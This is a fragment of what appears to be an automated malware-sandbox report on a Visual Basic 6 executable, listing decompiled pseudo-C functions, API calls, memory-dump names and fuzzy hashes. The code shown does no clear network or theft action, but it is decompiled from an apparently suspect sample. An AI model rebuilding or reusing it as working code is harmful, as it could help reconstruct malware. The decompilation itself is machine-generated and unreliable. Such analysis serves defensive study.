						_v152 = 0x41fb98;
					}
					_v128 =  *_v152;
					_t73 =  *((intOrPtr*)( *_v128 + 0x1c))(_v128,  &_v40);
					asm("fclex");
					_v132 = _t73;
					if(_v132 >= 0) {
						_v156 = _v156 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x40a258);
						_push(_v128);
						_push(_v132);
						L004015AC();
						_v156 = _t73;
					}
					_v136 = _v40;
					_v100 = 1;
					_v108 = 2;
					_t75 = 0x10;
					L00401420();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L00401552();
					_t76 =  &_v44;
					L004015B8();
					_t79 =  *((intOrPtr*)( *_v136 + 0x58))(_v136, _t76, _t76, _t75, _v28, 0x40a278);
					asm("fclex");
					_v140 = _t79;
					if(_v140 >= 0) {
						_v160 = _v160 & 0x00000000;
					} else {
						_push(0x58);
						_push(0x40a288);
						_push(_v136);
						_push(_v140);
						L004015AC();
						_v160 = _t79;
					}
					_push( &_v40);
					_t67 =  &_v44;
					_push(_t67);
					_push(2);
					L004015A0();
				}
				asm("wait");
				_push(0x41a868);
				L004015A6();
				return _t67;
			}

0x0041a67d
0x0041a68c
0x0041a698
0x0041a6a0
0x0041a6a3
0x0041a6aa
0x0041a6b9
0x0041a6bc
0x0041a6c3
0x0041a6d0
0x0041a6d8
0x0041a6dc
0x0041a6dd
0x0041a6e2
0x0041a6e9
0x0041a6f3
0x0041a6f4
0x0041a6f7
0x0041a6f8
0x0041a6fd
0x0041a704
0x0041a708
0x0041a709
0x0041a70b
0x0041a713
0x0041a719
0x0041a726
0x0041a743
0x0041a728
0x0041a728
0x0041a72d
0x0041a732
0x0041a737
0x0041a737
0x0041a755
0x0041a764
0x0041a767
0x0041a769
0x0041a770
0x0041a78c
0x0041a772
0x0041a772
0x0041a774
0x0041a779
0x0041a77c
0x0041a77f
0x0041a784
0x0041a784
0x0041a796
0x0041a79c
0x0041a7a3
0x0041a7ac
0x0041a7ad
0x0041a7b7
0x0041a7b8
0x0041a7b9
0x0041a7ba
0x0041a7c3
0x0041a7c9
0x0041a7cd
0x0041a7e1
0x0041a7e4
0x0041a7e6
0x0041a7f3
0x0041a815
0x0041a7f5
0x0041a7f5
0x0041a7f7
0x0041a7fc
0x0041a802
0x0041a808
0x0041a80d
0x0041a80d
0x0041a81f
0x0041a820
0x0041a823
0x0041a824
0x0041a826
0x0041a82b
0x0041a82e
0x0041a82f
0x0041a862
0x0041a867

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0041A698
__vbaVarDup.MSVBVM60 ref: 0041A6D0
#522.MSVBVM60(?,?), ref: 0041A6DD
__vbaVarTstNe.MSVBVM60(00008008,?,?,?,?,?), ref: 0041A6F8
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008008,?,?,?,?,?), ref: 0041A70B
__vbaNew2.MSVBVM60(0040A268,0041FB98,?,?,00401426), ref: 0041A732
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A258,0000001C), ref: 0041A77F
__vbaChkstk.MSVBVM60(00000000,?,0040A258,0000001C), ref: 0041A7AD
__vbaCastObj.MSVBVM60(?,0040A278), ref: 0041A7C3
__vbaObjSet.MSVBVM60(?,00000000,?,0040A278), ref: 0041A7CD
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A288,00000058), ref: 0041A808
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0041A826
__vbaFreeObj.MSVBVM60(0041A868,?,?,00401426), ref: 0041A862

Memory Dump Source

Source File: 00000000.00000002.673234009.0000000000416000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.673098487.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.673119523.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.673298451.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673312782.000000000043A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673327154.000000000043B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckChkstkHresultList$#522CastNew2
String ID:
API String ID: 3937340929-0
Opcode ID: 8565043ddcf6b79c0a80060caccdebf982bcc88c1f998a0e146d0b6503b79c53
Instruction ID: 803718dc0bbd6680435b3c4c725300758925ac83084d1ea3a81f15bd7f2392d3
Opcode Fuzzy Hash: 8565043ddcf6b79c0a80060caccdebf982bcc88c1f998a0e146d0b6503b79c53
Instruction Fuzzy Hash: CA510C71C00218AFDB10EFA4C845BDDBBB8BF08704F50816AE505BB2A1D7799999CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0041CBD8, Relevance: 18.1, APIs: 12, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E0041CBD8(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v12;
				intOrPtr* _v16;
				char _v44;
				char _v48;
				intOrPtr* _v52;
				signed int _v56;
				signed int _v60;
				signed int _v72;
				char _v76;
				signed int _v80;
				char _v84;
				char _v88;
				signed int _v92;
				signed int* _t58;
				char* _t59;
				signed int _t63;
				signed int _t67;
				char* _t71;
				signed int _t75;
				intOrPtr _t82;
				void* _t86;
				void* _t88;
				intOrPtr* _t89;
				signed long long _t99;
				intOrPtr _t104;

				_t89 = _t88 - 0xc;
				 *[fs:0x0] = _t89;
				L00401420();
				_v16 = _t89;
				_v12 = 0x4013d0;
				_t58 = _a8;
				 *_t58 =  *_t58 & 0x00000000;
				L004014FE();
				_t59 =  &_v44;
				L004015B8();
				_v52 = _t59;
				_t63 =  *((intOrPtr*)( *_v52 + 0x1c))(_v52,  &_v48, _t59, _t58, __edi, __esi, __ebx, 0x44,  *[fs:0x0], 0x401426, _t86);
				asm("fclex");
				_v56 = _t63;
				if(_v56 >= 0) {
					_v72 = _v72 & 0x00000000;
				} else {
					_push(0x1c);
					_push(0x40a300);
					_push(_v52);
					_push(_v56);
					L004015AC();
					_v72 = _t63;
				}
				_v60 =  ~(0 | _v48 != 0x00000000);
				L004015A6();
				_t67 = _v60;
				if(_t67 != 0) {
					if( *0x41e010 != 0) {
						_v76 = 0x41e010;
					} else {
						_push(0x41e010);
						_push(0x407448);
						L004015B2();
						_v76 = 0x41e010;
					}
					_t82 =  *((intOrPtr*)( *_v76));
					_t71 =  &_v44;
					L004015B8();
					_v52 = _t71;
					_t75 =  *((intOrPtr*)( *_v52 + 0x188))(_v52,  &_v48, _t71,  *((intOrPtr*)(_t82 + 0x314))( *_v76));
					asm("fclex");
					_v56 = _t75;
					if(_v56 >= 0) {
						_v80 = _v80 & 0x00000000;
					} else {
						_push(0x188);
						_push(0x40a120);
						_push(_v52);
						_push(_v56);
						L004015AC();
						_v80 = _t75;
					}
					_push(_t82);
					_v76 =  *0x4013c8;
					_t99 =  *0x4013c0 *  *0x401310;
					if( *0x41e000 != 0) {
						_push( *0x401214);
						_push( *0x401210);
						L00401444();
					} else {
						_t99 = _t99 /  *0x401210;
					}
					_v84 = _t99;
					_v88 = _v84;
					_v92 =  *0x4013b8;
					L004014CE();
					 *_t89 =  *0x4013ac;
					_t104 =  *0x4013a8;
					 *_t89 = _t104;
					asm("fild dword [ebp-0x2c]");
					_v88 = _t104;
					 *_t89 = _v88;
					_t67 =  *((intOrPtr*)( *_a4 + 0x2c0))(_a4, 0x1c2, _t82, _t82, _t82, _t75, _t82, _t82);
					asm("fclex");
					_v60 = _t67;
					if(_v60 >= 0) {
						_v92 = _v92 & 0x00000000;
					} else {
						_push(0x2c0);
						_push(0x409eb0);
						_push(_a4);
						_push(_v60);
						L004015AC();
						_v92 = _t67;
					}
					L004015A6();
				}
				asm("wait");
				_push(0x41cdda);
				return _t67;
			}

0x0041cbdb
0x0041cbea
0x0041cbf4
0x0041cbfc
0x0041cbff
0x0041cc06
0x0041cc09
0x0041cc0c
0x0041cc12
0x0041cc16
0x0041cc1b
0x0041cc2a
0x0041cc2d
0x0041cc2f
0x0041cc36
0x0041cc4f
0x0041cc38
0x0041cc38
0x0041cc3a
0x0041cc3f
0x0041cc42
0x0041cc45
0x0041cc4a
0x0041cc4a
0x0041cc5e
0x0041cc65
0x0041cc6a
0x0041cc70
0x0041cc7d
0x0041cc97
0x0041cc7f
0x0041cc7f
0x0041cc84
0x0041cc89
0x0041cc8e
0x0041cc8e
0x0041cca8
0x0041ccb2
0x0041ccb6
0x0041ccbb
0x0041ccca
0x0041ccd0
0x0041ccd2
0x0041ccd9
0x0041ccf5
0x0041ccdb
0x0041ccdb
0x0041cce0
0x0041cce5
0x0041cce8
0x0041cceb
0x0041ccf0
0x0041ccf0
0x0041ccff
0x0041cd00
0x0041cd09
0x0041cd16
0x0041cd20
0x0041cd26
0x0041cd2c
0x0041cd18
0x0041cd18
0x0041cd18
0x0041cd31
0x0041cd38
0x0041cd42
0x0041cd4b
0x0041cd58
0x0041cd5b
0x0041cd62
0x0041cd65
0x0041cd68
0x0041cd6f
0x0041cd7f
0x0041cd85
0x0041cd87
0x0041cd8e
0x0041cdaa
0x0041cd90
0x0041cd90
0x0041cd95
0x0041cd9a
0x0041cd9d
0x0041cda0
0x0041cda5
0x0041cda5
0x0041cdb1
0x0041cdb1
0x0041cdb6
0x0041cdb7
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0041CBF4
#685.MSVBVM60(?,?,?,?,00401426), ref: 0041CC0C
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,00401426), ref: 0041CC16
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A300,0000001C), ref: 0041CC45
__vbaFreeObj.MSVBVM60 ref: 0041CC65
__vbaNew2.MSVBVM60(00407448,0041E010), ref: 0041CC89
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041CCB6
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A120,00000188), ref: 0041CCEB
_adj_fdiv_m64.MSVBVM60 ref: 0041CD2C
__vbaFpI4.MSVBVM60 ref: 0041CD4B
__vbaHresultCheckObj.MSVBVM60(00000000,004013D0,00409EB0,000002C0,?,?,?,00000000), ref: 0041CDA0
__vbaFreeObj.MSVBVM60(?,?,?,00000000), ref: 0041CDB1

Memory Dump Source

Source File: 00000000.00000002.673234009.0000000000416000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.673098487.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.673119523.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.673298451.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673312782.000000000043A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673327154.000000000043B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$Free$#685ChkstkNew2_adj_fdiv_m64
String ID:
API String ID: 3227140402-0
Opcode ID: 7aaa3ef05f3ac15909ea4e20ee1f034aea198611e299e5dc1d9590660b0edcd3
Instruction ID: 9ecf30a92ba43d7b0f478c677b0afe92e570c53f2041ddc122a07c8347c37687
Opcode Fuzzy Hash: 7aaa3ef05f3ac15909ea4e20ee1f034aea198611e299e5dc1d9590660b0edcd3
Instruction Fuzzy Hash: 7D511371951208EFDB00AFA1ED89BEDBFB5FF08704F10446AF542BA1A0D7789890DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041B8D7, Relevance: 18.1, APIs: 12, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0041B8D7(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a24) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				char _v32;
				intOrPtr _v40;
				char _v48;
				intOrPtr _v56;
				char _v64;
				intOrPtr _v72;
				char _v80;
				intOrPtr _v88;
				char _v96;
				intOrPtr _v104;
				intOrPtr _v112;
				intOrPtr _v120;
				char _v128;
				void* _v164;
				signed int _v168;
				signed int _v176;
				short _t54;
				char* _t57;
				char* _t58;
				signed int _t65;
				intOrPtr _t81;

				_push(0x401426);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t81;
				L00401420();
				_v12 = _t81;
				_v8 = 0x4012a0;
				L00401582();
				_v104 = 0x40a2a8;
				_v112 = 8;
				L00401576();
				_push( &_v48);
				_push( &_v64);
				L00401504();
				_v120 = 0x40a2b0;
				_v128 = 0x8008;
				_push( &_v64);
				_t54 =  &_v128;
				_push(_t54);
				L0040155E();
				_v164 = _t54;
				_push( &_v64);
				_push( &_v48);
				_push(2);
				L0040159A();
				_t57 = _v164;
				if(_t57 != 0) {
					L004014FE();
					_t58 =  &_v32;
					L004015B8();
					_v164 = _t58;
					_v88 = 0x80020004;
					_v96 = 0xa;
					_v72 = 0x80020004;
					_v80 = 0xa;
					_v56 = 0x80020004;
					_v64 = 0xa;
					_v40 = 0x80020004;
					_v48 = 0xa;
					_t65 =  *((intOrPtr*)( *_v164 + 0x44))(_v164, 0x1e47,  &_v48,  &_v64,  &_v80,  &_v96, _t58, _t57);
					asm("fclex");
					_v168 = _t65;
					if(_v168 >= 0) {
						_v176 = _v176 & 0x00000000;
					} else {
						_push(0x44);
						_push(0x40a300);
						_push(_v164);
						_push(_v168);
						L004015AC();
						_v176 = _t65;
					}
					L004015A6();
					_push( &_v96);
					_push( &_v80);
					_push( &_v64);
					_t57 =  &_v48;
					_push(_t57);
					_push(4);
					L0040159A();
				}
				_push(0x41ba7a);
				L00401588();
				return _t57;
			}

0x0041b8dc
0x0041b8e7
0x0041b8e8
0x0041b8f4
0x0041b8fc
0x0041b8ff
0x0041b90c
0x0041b911
0x0041b918
0x0041b925
0x0041b92d
0x0041b931
0x0041b932
0x0041b937
0x0041b93e
0x0041b948
0x0041b949
0x0041b94c
0x0041b94d
0x0041b952
0x0041b95c
0x0041b960
0x0041b961
0x0041b963
0x0041b96b
0x0041b974
0x0041b97a
0x0041b980
0x0041b984
0x0041b989
0x0041b98f
0x0041b996
0x0041b99d
0x0041b9a4
0x0041b9ab
0x0041b9b2
0x0041b9b9
0x0041b9c0
0x0041b9ea
0x0041b9ed
0x0041b9ef
0x0041b9fc
0x0041ba1e
0x0041b9fe
0x0041b9fe
0x0041ba00
0x0041ba05
0x0041ba0b
0x0041ba11
0x0041ba16
0x0041ba16
0x0041ba28
0x0041ba30
0x0041ba34
0x0041ba38
0x0041ba39
0x0041ba3c
0x0041ba3d
0x0041ba3f
0x0041ba44
0x0041ba47
0x0041ba74
0x0041ba79

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0041B8F4
__vbaStrCopy.MSVBVM60(?,?,?,?,00401426), ref: 0041B90C
__vbaVarDup.MSVBVM60 ref: 0041B925
#518.MSVBVM60(?,?), ref: 0041B932
__vbaVarTstNe.MSVBVM60(00008008,?,?,?,?,?), ref: 0041B94D
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008008,?,?,?,?,?), ref: 0041B963
#685.MSVBVM60 ref: 0041B97A
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041B984
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A300,00000044), ref: 0041BA11
__vbaFreeObj.MSVBVM60 ref: 0041BA28
__vbaFreeVarList.MSVBVM60(00000004,0000000A,0000000A,0000000A,0000000A), ref: 0041BA3F
__vbaFreeStr.MSVBVM60(0041BA7A), ref: 0041BA74

Memory Dump Source

Source File: 00000000.00000002.673234009.0000000000416000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.673098487.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.673119523.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.673298451.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673312782.000000000043A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673327154.000000000043B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$List$#518#685CheckChkstkCopyHresult
String ID:
API String ID: 562741255-0
Opcode ID: 9b5b6a5b4d90e018c670c9f591e20396950f8454aa84c832a24a326ab7619d27
Instruction ID: 265d515d96f8fee8a6b90868dc50ea01a2cb396b5694d61334ca84fad9e63953
Opcode Fuzzy Hash: 9b5b6a5b4d90e018c670c9f591e20396950f8454aa84c832a24a326ab7619d27
Instruction Fuzzy Hash: BC41E7B1D0020DAFDB11DFD1C841BDEB7B8EF45304F50816AE115BA1A1DB789A49CFAA

Uniqueness

Uniqueness Score: -1.00%

Function 0041CFBE, Relevance: 16.6, APIs: 11, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E0041CFBE(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v36;
				char _v40;
				char _v56;
				char _v72;
				intOrPtr _v96;
				intOrPtr _v104;
				intOrPtr _v112;
				char _v120;
				void* _v124;
				signed int _v128;
				intOrPtr* _v140;
				signed int _v144;
				short _t50;
				signed int _t53;
				char* _t57;
				void* _t71;
				void* _t73;
				intOrPtr _t74;

				_t74 = _t73 - 0xc;
				 *[fs:0x0] = _t74;
				L00401420();
				_v16 = _t74;
				_v12 = 0x4013f0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x78,  *[fs:0x0], 0x401426, _t71);
				_v96 = 0x40a238;
				_v104 = 8;
				L00401576();
				_push( &_v56);
				_push( &_v72);
				L00401558();
				_v112 = 0x40a244;
				_v120 = 0x8008;
				_push( &_v72);
				_t50 =  &_v120;
				_push(_t50);
				L0040155E();
				_v124 = _t50;
				_push( &_v72);
				_push( &_v56);
				_push(2);
				L0040159A();
				_t53 = _v124;
				if(_t53 != 0) {
					if( *0x41e010 != 0) {
						_v140 = 0x41e010;
					} else {
						_push(0x41e010);
						_push(0x407448);
						L004015B2();
						_v140 = 0x41e010;
					}
					_t57 =  &_v40;
					L004015B8();
					_v124 = _t57;
					_t53 =  *((intOrPtr*)( *_v124 + 0x130))(_v124,  &_v36, _t57,  *((intOrPtr*)( *((intOrPtr*)( *_v140)) + 0x304))( *_v140));
					asm("fclex");
					_v128 = _t53;
					if(_v128 >= 0) {
						_v144 = _v144 & 0x00000000;
					} else {
						_push(0x130);
						_push(0x40a0f4);
						_push(_v124);
						_push(_v128);
						L004015AC();
						_v144 = _t53;
					}
					_push(_v36);
					_push(0xa7);
					_push(0xffffffff);
					_push(0x20);
					L004014B6();
					L00401588();
					L004015A6();
				}
				asm("wait");
				_push(0x41d147);
				return _t53;
			}

0x0041cfc1
0x0041cfd0
0x0041cfda
0x0041cfe2
0x0041cfe5
0x0041cfec
0x0041cffb
0x0041cffe
0x0041d005
0x0041d012
0x0041d01a
0x0041d01e
0x0041d01f
0x0041d024
0x0041d02b
0x0041d035
0x0041d036
0x0041d039
0x0041d03a
0x0041d03f
0x0041d046
0x0041d04a
0x0041d04b
0x0041d04d
0x0041d055
0x0041d05b
0x0041d068
0x0041d085
0x0041d06a
0x0041d06a
0x0041d06f
0x0041d074
0x0041d079
0x0041d079
0x0041d0a9
0x0041d0ad
0x0041d0b2
0x0041d0c1
0x0041d0c7
0x0041d0c9
0x0041d0d0
0x0041d0ef
0x0041d0d2
0x0041d0d2
0x0041d0d7
0x0041d0dc
0x0041d0df
0x0041d0e2
0x0041d0e7
0x0041d0e7
0x0041d0f6
0x0041d0f9
0x0041d0fe
0x0041d100
0x0041d102
0x0041d10a
0x0041d112
0x0041d112
0x0041d117
0x0041d118
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0041CFDA
__vbaVarDup.MSVBVM60 ref: 0041D012
#522.MSVBVM60(?,?), ref: 0041D01F
__vbaVarTstNe.MSVBVM60(00008008,?,?,?,?,?), ref: 0041D03A
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008008,?,?,?,?,?), ref: 0041D04D
__vbaNew2.MSVBVM60(00407448,0041E010,?,?,00401426), ref: 0041D074
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041D0AD
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A0F4,00000130), ref: 0041D0E2
__vbaFileOpen.MSVBVM60(00000020,000000FF,000000A7,?), ref: 0041D102
__vbaFreeStr.MSVBVM60(00000020,000000FF,000000A7,?), ref: 0041D10A
__vbaFreeObj.MSVBVM60(00000020,000000FF,000000A7,?), ref: 0041D112

Memory Dump Source

Source File: 00000000.00000002.673234009.0000000000416000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.673098487.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.673119523.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.673298451.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673312782.000000000043A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673327154.000000000043B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#522CheckChkstkFileHresultListNew2Open
String ID:
API String ID: 3438514485-0
Opcode ID: fc0228a97ab6cefd3c1dc85bb0419d0aee568282644332a0e73e87053d77bed7
Instruction ID: 2b046db58e2c75c4ce1d87b64740c5803a9c16a5298250edac61a75157aa29ad
Opcode Fuzzy Hash: fc0228a97ab6cefd3c1dc85bb0419d0aee568282644332a0e73e87053d77bed7
Instruction Fuzzy Hash: FD413B71D00208ABDB10DFA1CC45FDDBBB8BF08704F60856AE105BB2A1DB799A84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041C1D1, Relevance: 15.1, APIs: 10, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0041C1D1(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a40) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				void* _v40;
				char _v44;
				char _v48;
				signed int _v52;
				signed int _v56;
				char _v60;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t45;
				signed int _t46;
				signed int _t50;
				signed int _t54;
				char* _t59;
				void* _t64;
				void* _t66;
				intOrPtr* _t67;
				signed long long _t75;

				_t67 = _t66 - 0xc;
				 *[fs:0x0] = _t67;
				L00401420();
				_v16 = _t67;
				_v12 = 0x401328;
				_v8 = 0;
				_t45 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x38,  *[fs:0x0], 0x401426, _t64);
				L00401576();
				L004014FE();
				_t46 =  &_v44;
				L004015B8();
				_v52 = _t46;
				_t50 =  *((intOrPtr*)( *_v52 + 0x1c))(_v52,  &_v48, _t46, _t45);
				asm("fclex");
				_v56 = _t50;
				if(_v56 >= 0) {
					_v72 = _v72 & 0x00000000;
				} else {
					_push(0x1c);
					_push(0x40a300);
					_push(_v52);
					_push(_v56);
					L004015AC();
					_v72 = _t50;
				}
				_v60 =  ~(0 | _v48 != 0x00000000);
				_t59 =  &_v44;
				L004015A6();
				_t54 = _v60;
				if(_t54 != 0) {
					_push(_t59);
					_v60 =  *0x401320;
					_t75 =  *0x401318 *  *0x401310;
					if( *0x41e000 != 0) {
						_push( *0x401214);
						_push( *0x401210);
						L00401444();
					} else {
						_t75 = _t75 /  *0x401210;
					}
					_v76 = _t75;
					_v72 = _v76;
					_v76 =  *0x401308;
					L004014CE();
					 *_t67 =  *0x4012f8;
					 *_t67 =  *0x4012f4;
					 *_t67 =  *0x4012f0;
					_t54 =  *((intOrPtr*)( *_a4 + 0x2c0))(_a4, 0x1c2, _t59, _t59, _t59, _t54, _t59, _t59);
					asm("fclex");
					_v52 = _t54;
					if(_v52 >= 0) {
						_v80 = _v80 & 0x00000000;
					} else {
						_push(0x2c0);
						_push(0x409eb0);
						_push(_a4);
						_push(_v52);
						L004015AC();
						_v80 = _t54;
					}
				}
				asm("wait");
				_push(0x41c352);
				L00401594();
				return _t54;
			}

0x0041c1d4
0x0041c1e3
0x0041c1ed
0x0041c1f5
0x0041c1f8
0x0041c1ff
0x0041c20e
0x0041c217
0x0041c21c
0x0041c222
0x0041c226
0x0041c22b
0x0041c23a
0x0041c23d
0x0041c23f
0x0041c246
0x0041c25f
0x0041c248
0x0041c248
0x0041c24a
0x0041c24f
0x0041c252
0x0041c255
0x0041c25a
0x0041c25a
0x0041c26e
0x0041c272
0x0041c275
0x0041c27a
0x0041c280
0x0041c28c
0x0041c28d
0x0041c296
0x0041c2a3
0x0041c2ad
0x0041c2b3
0x0041c2b9
0x0041c2a5
0x0041c2a5
0x0041c2a5
0x0041c2be
0x0041c2c5
0x0041c2cf
0x0041c2d8
0x0041c2e5
0x0041c2ef
0x0041c2f9
0x0041c309
0x0041c30f
0x0041c311
0x0041c318
0x0041c334
0x0041c31a
0x0041c31a
0x0041c31f
0x0041c324
0x0041c327
0x0041c32a
0x0041c32f
0x0041c32f
0x0041c318
0x0041c338
0x0041c339
0x0041c34c
0x0041c351

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0041C1ED
__vbaVarDup.MSVBVM60(?,?,?,?,00401426), ref: 0041C217
#685.MSVBVM60(?,?,?,?,00401426), ref: 0041C21C
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,00401426), ref: 0041C226
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A300,0000001C), ref: 0041C255
__vbaFreeObj.MSVBVM60(00000000,?,0040A300,0000001C), ref: 0041C275
_adj_fdiv_m64.MSVBVM60 ref: 0041C2B9
__vbaFpI4.MSVBVM60 ref: 0041C2D8
__vbaHresultCheckObj.MSVBVM60(00000000,00401328,00409EB0,000002C0,?,?,?,00000000), ref: 0041C32A
__vbaFreeVar.MSVBVM60(0041C352), ref: 0041C34C

Memory Dump Source

Source File: 00000000.00000002.673234009.0000000000416000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.673098487.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.673119523.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.673298451.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673312782.000000000043A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673327154.000000000043B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresult$#685Chkstk_adj_fdiv_m64
String ID:
API String ID: 3815940840-0
Opcode ID: 82744546dda8f0a61269763a8fe9c59370e6dbe0074cba463f1f94e762b50e95
Instruction ID: efebfb76013746f3e31f9383fc7ac782d615bf5ecd52feb670f78eee7fe0a341
Opcode Fuzzy Hash: 82744546dda8f0a61269763a8fe9c59370e6dbe0074cba463f1f94e762b50e95
Instruction Fuzzy Hash: 5F413470951208EFDB00AFA1DE89BEDBBB5FF08704F4184AAF441B61B1C7389994DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041B2CA, Relevance: 15.1, APIs: 10, Instructions: 105
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0041B2CA(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a36, signed int* _a64) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v56;
				char _v60;
				intOrPtr _v68;
				intOrPtr _v76;
				intOrPtr _v84;
				intOrPtr _v92;
				intOrPtr _v100;
				intOrPtr _v108;
				intOrPtr* _v112;
				signed int _v116;
				intOrPtr* _v128;
				signed int _v132;
				char* _t47;
				signed int _t53;
				intOrPtr _t58;
				void* _t70;
				void* _t72;
				intOrPtr _t73;

				_t73 = _t72 - 0xc;
				 *[fs:0x0] = _t73;
				L00401420();
				_v16 = _t73;
				_v12 = 0x401260;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x6c,  *[fs:0x0], 0x401426, _t70);
				L00401576();
				 *_a64 =  *_a64 & 0x00000000;
				if( *0x41e010 != 0) {
					_v128 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v128 = 0x41e010;
				}
				_t58 =  *((intOrPtr*)( *_v128));
				_t47 =  &_v60;
				L004015B8();
				_v112 = _t47;
				_v100 = 0x80020004;
				_v108 = 0xa;
				_v84 = 0x80020004;
				_v92 = 0xa;
				_v68 = 0x80020004;
				_v76 = 0xa;
				L00401420();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401420();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401420();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v56 =  *0x401258;
				_t53 =  *((intOrPtr*)( *_v112 + 0x1b4))(_v112, _t58, 0x10, 0x10, 0x10, _t47,  *((intOrPtr*)(_t58 + 0x310))( *_v128));
				asm("fclex");
				_v116 = _t53;
				if(_v116 >= 0) {
					_v132 = _v132 & 0x00000000;
				} else {
					_push(0x1b4);
					_push(0x40a120);
					_push(_v112);
					_push(_v116);
					L004015AC();
					_v132 = _t53;
				}
				L004015A6();
				asm("wait");
				_push(0x41b435);
				L00401594();
				return _t53;
			}

0x0041b2cd
0x0041b2dc
0x0041b2e6
0x0041b2ee
0x0041b2f1
0x0041b2f8
0x0041b307
0x0041b310
0x0041b318
0x0041b322
0x0041b33c
0x0041b324
0x0041b324
0x0041b329
0x0041b32e
0x0041b333
0x0041b333
0x0041b34d
0x0041b357
0x0041b35b
0x0041b360
0x0041b363
0x0041b36a
0x0041b371
0x0041b378
0x0041b37f
0x0041b386
0x0041b390
0x0041b39a
0x0041b39b
0x0041b39c
0x0041b39d
0x0041b3a1
0x0041b3ab
0x0041b3ac
0x0041b3ad
0x0041b3ae
0x0041b3b2
0x0041b3bc
0x0041b3bd
0x0041b3be
0x0041b3bf
0x0041b3c7
0x0041b3d2
0x0041b3d8
0x0041b3da
0x0041b3e1
0x0041b3fd
0x0041b3e3
0x0041b3e3
0x0041b3e8
0x0041b3ed
